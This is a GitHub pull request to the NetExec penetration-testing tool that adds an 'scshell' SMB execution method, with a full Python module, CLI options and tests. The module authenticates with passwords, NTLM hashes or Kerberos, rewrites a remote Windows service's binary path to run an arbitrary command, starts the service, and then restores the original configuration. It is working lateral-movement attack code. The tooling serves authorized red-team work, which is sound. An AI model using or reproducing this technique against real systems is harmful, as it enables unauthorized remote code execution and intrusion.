### PR TITLE
Add scshell SMB execution method

### DIFF
--- a/nxc/protocols/smb.py
+++ b/nxc/protocols/smb.py
@@ -49,6 +49,7 @@ from nxc.protocols.smb.wmiexec import WMIEXEC
 from nxc.protocols.smb.atexec import TSCH_EXEC
 from nxc.protocols.smb.smbexec import SMBEXEC
 from nxc.protocols.smb.mmcexec import MMCEXEC
+from nxc.protocols.smb.scshell import SCSHELL
 from nxc.protocols.smb.smbspider import SMBSpider
 from nxc.protocols.smb.passpol import PassPolDump
 from nxc.protocols.smb.samruser import UserSamrDump
@@ -941,6 +942,28 @@ class smb(connection):
                     break
                 except Exception:
                     self.logger.debug("Error executing command via smbexec, traceback:")
+                    self.logger.debug(format_exc())
+                    continue
+            elif method == "scshell":
+                try:
+                    exec_method = SCSHELL(
+                        self.host if not self.kerberos else self.hostname + "." + self.domain,
+                        self.username,
+                        self.password,
+                        self.domain,
+                        self.kerberos,
+                        self.aesKey,
+                        self.host,
+                        self.kdcHost,
+                        self.hash,
+                        self.logger,
+                        self.args.sc_service_name,
+                        self.args.sc_no_cmd,
+                    )
+                    self.logger.info("Executed command via scshell")
+                    break
+                except Exception:
+                    self.logger.debug("Error executing command via scshell, traceback:")
                     self.logger.debug(format_exc())
                     continue
 

--- a/nxc/protocols/smb/proto_args.py
+++ b/nxc/protocols/smb/proto_args.py
@@ -93,11 +93,13 @@ def proto_args(parser, parents):
     files_group.add_argument("--append-host", action="store_true", help="append the host to the get-file filename")
 
     cmd_exec_group = smb_parser.add_argument_group("Command Execution")
-    cmd_exec_group.add_argument("--exec-method", choices={"wmiexec", "mmcexec", "smbexec", "atexec"}, default="wmiexec", help="method to execute the command. Ignored if in MSSQL mode", action=DefaultTrackingAction)
+    cmd_exec_group.add_argument("--exec-method", choices={"wmiexec", "mmcexec", "smbexec", "atexec", "scshell"}, default="wmiexec", help="method to execute the command. Ignored if in MSSQL mode", action=DefaultTrackingAction)
     cmd_exec_group.add_argument("--dcom-timeout", help="DCOM connection timeout", type=int, default=5)
     cmd_exec_group.add_argument("--get-output-tries", help="Number of times atexec/smbexec/mmcexec tries to get results", type=int, default=10)
     cmd_exec_group.add_argument("--codec", default="utf-8", help="Set encoding used (codec) from the target's output. If errors are detected, run chcp.com at the target & map the result with https://docs.python.org/3/library/codecs.html#standard-encodings and then execute again with --codec and the corresponding codec")
     cmd_exec_group.add_argument("--no-output", action="store_true", help="do not retrieve command output")
+    cmd_exec_group.add_argument("--sc-service-name", default="RemoteRegistry", help="service name to reconfigure temporarily when using --exec-method scshell")
+    cmd_exec_group.add_argument("--sc-no-cmd", action="store_true", help="when using --exec-method scshell, do not prepend cmd.exe /c to the command")
 
     cmd_exec_method_group = cmd_exec_group.add_mutually_exclusive_group()
     cmd_exec_method_group.add_argument("-x", metavar="COMMAND", dest="execute", help="execute the specified CMD command")

--- a/nxc/protocols/smb/scshell.py
+++ b/nxc/protocols/smb/scshell.py
@@ -1,0 +1,214 @@
+import os
+from time import sleep
+
+from impacket import ntlm
+from impacket.dcerpc.v5 import epm, scmr, transport
+from impacket.dcerpc.v5.dtypes import NULL
+from impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_GSS_NEGOTIATE, RPC_C_AUTHN_LEVEL_PKT_PRIVACY
+
+
+class SCSHELL:
+    def __init__(
+        self,
+        target,
+        username="",
+        password="",
+        domain="",
+        doKerberos=False,
+        aesKey=None,
+        remoteHost=None,
+        kdcHost=None,
+        hashes=None,
+        logger=None,
+        service_name="RemoteRegistry",
+        no_cmd=False,
+        wait_time=5,
+    ):
+        self.__target = target
+        self.__username = username
+        self.__password = password
+        self.__domain = domain
+        self.__lmhash = ""
+        self.__nthash = ""
+        self.__aesKey = aesKey
+        self.__doKerberos = doKerberos
+        self.__remoteHost = remoteHost
+        self.__kdcHost = kdcHost
+        self.__serviceName = service_name
+        self.__noCmd = no_cmd
+        self.__waitTime = wait_time
+        self.__rpctransport = None
+        self.__scmr = None
+        self.__scHandle = None
+        self.__serviceHandle = None
+        self.__binaryPath = None
+        self.__startType = None
+        self.__errorControl = None
+        self.__outputBuffer = b""
+        self.logger = logger
+
+        if hashes is not None:
+            if ":" in hashes:
+                self.__lmhash, self.__nthash = hashes.split(":")
+            else:
+                self.__nthash = hashes
+
+        if self.__password is None:
+            self.__password = ""
+
+        self._connect()
+
+    def _connect(self):
+        stringbinding = epm.hept_map(self.__target, scmr.MSRPC_UUID_SCMR, protocol="ncacn_ip_tcp")
+        self.logger.debug(f"StringBinding {stringbinding}")
+        self.__rpctransport = transport.DCERPCTransportFactory(stringbinding)
+
+        if hasattr(self.__rpctransport, "setRemoteHost") and self.__remoteHost:
+            self.__rpctransport.setRemoteHost(self.__remoteHost)
+
+        if hasattr(self.__rpctransport, "set_credentials"):
+            self.__rpctransport.set_credentials(
+                self.__username,
+                self.__password,
+                self.__domain,
+                self.__lmhash,
+                self.__nthash,
+                self.__aesKey,
+            )
+
+        self.__rpctransport.set_kerberos(self.__doKerberos, self.__kdcHost)
+        self.__scmr = self.__rpctransport.get_dce_rpc()
+
+        if self.__doKerberos:
+            try:
+                self.__scmr.set_auth_type(RPC_C_AUTHN_GSS_NEGOTIATE)
+            except Exception:
+                pass
+
+        try:
+            self.__scmr.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
+        except Exception:
+            self.__scmr.set_auth_level(ntlm.NTLM_AUTH_PKT_PRIVACY)
+
+        self.__scmr.connect()
+        self.__scmr.bind(scmr.MSRPC_UUID_SCMR)
+
+        resp = scmr.hROpenSCManagerW(self.__scmr)
+        self.__scHandle = resp["lpScHandle"]
+        self.logger.debug(f"Opening service {self.__serviceName}")
+
+        resp = scmr.hROpenServiceW(self.__scmr, self.__scHandle, self.__serviceName)
+        self.__serviceHandle = resp["lpServiceHandle"]
+
+        resp = scmr.hRQueryServiceConfigW(self.__scmr, self.__serviceHandle)
+        service_config = resp["lpServiceConfig"]
+        self.__binaryPath = service_config["lpBinaryPathName"]
+        self.__startType = service_config["dwStartType"]
+        self.__errorControl = service_config["dwErrorControl"]
+        self.logger.debug(f"({self.__serviceName}) Current service binary path {self.__binaryPath}")
+
+    def execute(self, command, output=False):
+        self.__outputBuffer = b""
+        if output:
+            self.logger.info("SCSHELL does not support output retrieval, executing without output")
+
+        if self.__noCmd:
+            self.logger.info("SCSHELL is running in raw mode, the command should use a full binary path")
+
+        try:
+            if os.path.isfile(command):
+                with open(command) as commands:
+                    for line in commands:
+                        line = line.strip()
+                        if line:
+                            self.execute_remote(line)
+            else:
+                self.execute_remote(command)
+        finally:
+            self.finish()
+
+        return self.__outputBuffer
+
+    def execute_remote(self, command):
+        final_command = command if self.__noCmd else rf"C:\windows\system32\cmd.exe /Q /c {command}"
+        self.logger.debug(f"({self.__serviceName}) Updating service binary path to {final_command}")
+
+        try:
+            scmr.hRChangeServiceConfigW(
+                self.__scmr,
+                self.__serviceHandle,
+                scmr.SERVICE_NO_CHANGE,
+                scmr.SERVICE_DEMAND_START,
+                scmr.SERVICE_ERROR_IGNORE,
+                final_command,
+                NULL,
+                NULL,
+                NULL,
+                NULL,
+                NULL,
+                NULL,
+                NULL,
+                NULL,
+            )
+        except Exception as e:
+            self.logger.fail(f"SCSHELL: Failed to update service {self.__serviceName}: {e}")
+            return
+
+        try:
+            self.logger.debug(f"Starting service {self.__serviceName}")
+            scmr.hRStartServiceW(self.__scmr, self.__serviceHandle)
+        except Exception as e:
+            error = str(e)
+            if "ERROR_SERVICE_REQUEST_TIMEOUT" not in error:
+                self.logger.fail(error)
+        finally:
+            sleep(self.__waitTime)
+            self._restore_service_config()
+
+    def _restore_service_config(self):
+        if not self.__serviceHandle:
+            return
+
+        self.logger.debug(f"({self.__serviceName}) Reverting binary path to {self.__binaryPath}")
+        try:
+            scmr.hRChangeServiceConfigW(
+                self.__scmr,
+                self.__serviceHandle,
+                scmr.SERVICE_NO_CHANGE,
+                self.__startType,
+                self.__errorControl,
+                self.__binaryPath,
+                NULL,
+                NULL,
+                NULL,
+                NULL,
+                NULL,
+                NULL,
+                NULL,
+                NULL,
+            )
+        except Exception as e:
+            self.logger.fail(f"SCSHELL: Failed to restore service {self.__serviceName}: {e}")
+
+    def finish(self):
+        if self.__serviceHandle:
+            try:
+                scmr.hRCloseServiceHandle(self.__scmr, self.__serviceHandle)
+            except Exception:
+                pass
+            finally:
+                self.__serviceHandle = None
+
+        if self.__scHandle:
+            try:
+                scmr.hRCloseServiceHandle(self.__scmr, self.__scHandle)
+            except Exception:
+                pass
+            finally:
+                self.__scHandle = None
+
+        if self.__scmr:
+            try:
+                self.__scmr.disconnect()
+            except Exception:
+                pass

--- a/tests/e2e_commands.txt
+++ b/tests/e2e_commands.txt
@@ -40,6 +40,7 @@ netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -x ipconfig
 netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -x ipconfig --exec-method atexec
 netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -x ipconfig --exec-method smbexec
 netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -x ipconfig --exec-method mmcexec
+netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -x ipconfig --exec-method scshell --sc-service-name RemoteRegistry --no-output
 netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS --put-file TEST_NORMAL_FILE \\Windows\\Temp\\test_file.txt
 netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS --put-file TEST_NORMAL_FILE \\Windows\\Temp\\test_file.txt --put-file TEST_NORMAL_FILE \\Windows\\Temp\\test_file2.txt
 netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS --get-file \\Windows\\Temp\\test_file.txt /tmp/test_file.txt
@@ -49,6 +50,7 @@ netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -X ipconfig
 netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -X ipconfig --exec-method atexec
 netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -X ipconfig --exec-method smbexec
 netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -X ipconfig --exec-method mmcexec
+netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -X ipconfig --exec-method scshell --sc-service-name RemoteRegistry --no-output
 netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -X ipconfig --force-ps32
 netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -X ipconfig --obfs
 netexec smb TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -X ipconfig --force-ps32 --obfs

--- a/tests/test_smb_cli.py
+++ b/tests/test_smb_cli.py
@@ -1,0 +1,35 @@
+import sys
+from pathlib import Path
+
+sys.path.insert(0, str(Path(__file__).resolve().parents[1]))
+
+import nxc.cli as cli
+
+
+def test_smb_parser_accepts_scshell_exec_method(monkeypatch):
+    monkeypatch.setattr(cli.argcomplete, "autocomplete", lambda *args, **kwargs: None)
+    monkeypatch.setattr(cli.importlib.metadata, "version", lambda _: "1.4.0+0.deadbeef")
+    monkeypatch.setattr(cli, "get_module_names", lambda: [])
+    monkeypatch.setattr(
+        sys,
+        "argv",
+        [
+            "netexec",
+            "smb",
+            "127.0.0.1",
+            "-u",
+            "user",
+            "-p",
+            "pass",
+            "-x",
+            "whoami",
+            "--exec-method",
+            "scshell",
+        ],
+    )
+
+    args, _ = cli.gen_cli_args()
+
+    assert args.exec_method == "scshell"
+    assert args.sc_service_name == "RemoteRegistry"
+    assert args.sc_no_cmd is False


### PR DESCRIPTION
## Description

This PR adds a new SMB command execution method: `--exec-method scshell`.

The implementation uses SCMR to temporarily update the target service binary path, start the service to execute the supplied command, and then restore the original service configuration.

This adds an additional execution method for SMB `-x` / `-X` usage. The method currently does not support command output retrieval, so it is intended to be used with `--no-output`.

Additional CLI options were added to support the technique:

- `--sc-service-name` to choose the target service
- `--sc-no-cmd` to avoid prepending `cmd.exe /c`

Tests were also added/updated:
- parser regression coverage for `--exec-method scshell`
- `tests/e2e_commands.txt` updated with SMB scshell examples

No new third-party dependencies are required.

Relevant sources / references:
- Original [scshell](https://github.com/Mr-Un1k0d3r/SCShell) approach by @MrUn1k0d3r
- Impacket SCMR / DCE-RPC service control patterns
- Service configuration abuse via `ChangeServiceConfig`

AI disclosure:
This PR was AI-assisted using OpenAI Codex. AI was used for implementation assistance and test scaffolding. All code was reviewed, adjusted, and manually tested by me before submission.

## Type of change
- [ ] Bug fix (non-breaking change which fixes an issue)
- [x] New feature (non-breaking change which adds functionality)
- [ ] Breaking change (fix or feature that would cause existing functionality to not work as expected)
- [ ] Deprecation of feature or functionality
- [ ] This change requires a documentation update
- [ ] This requires a third party update (such as Impacket, Dploot, lsassy, etc)
- [x] This PR was created with the assistance of AI (list what type of assistance, tool(s)/model(s) in the description)

## Setup guide for the review
Tested locally on Linux using Python 3.13.

Validation performed locally:
- `pytest tests/test_smb_cli.py tests/test_smb_database.py -q`
- `python -m py_compile nxc/protocols/smb/scshell.py nxc/protocols/smb.py nxc/protocols/smb/proto_args.py tests/test_smb_cli.py`
- Installed from the branch with: `pipx install --editable . --suffix=-scshelltest`

Example review/test command:
- `netexec smb TARGET -u USER -p PASS -x whoami --exec-method scshell --sc-service-name RemoteRegistry --no-output`

PowerShell variant:
- `netexec smb TARGET -u USER -p PASS -X whoami --exec-method scshell --sc-service-name RemoteRegistry --no-output`

Notes for reviewers:
- This execution method does not retrieve command output
- The target must have a suitable existing service available
- `RemoteRegistry` was used as the default/configurable service name for testing
- No extra software or dependency changes are required
- No GPO changes or registry changes are required specifically for this feature


## Screenshots (if appropriate):
<img width="1870" height="559" alt="scshell" src="https://github.com/user-attachments/assets/795184ad-a1b6-4a4a-a936-90b2f1170758" />

<img width="1818" height="557" alt="scshell-sliver" src="https://github.com/user-attachments/assets/b878d08d-063c-44b1-9b7f-61a2bdd836b5" />


## Checklist:
- [ ] I have ran Ruff against my changes (poetry: `poetry run ruff check .`, use `--fix` to automatically fix what it can)
- [x] I have added or updated the `tests/e2e_commands.txt` file if necessary (new modules or features are _required_ to be added to the e2e tests)
- [ ] If reliant on changes of third party dependencies, such as Impacket, dploot, lsassy, etc, I have linked the relevant PRs in those projects
- [x] I have linked relevant sources that describes the added technique (blog posts, documentation, etc)
- [x] I have performed a self-review of my own code (_not_ an AI review)
- [ ] I have commented my code, particularly in hard-to-understand areas
- [ ] I have made corresponding changes to the documentation (PR here: https://github.com/Pennyw0rth/NetExec-Wiki)
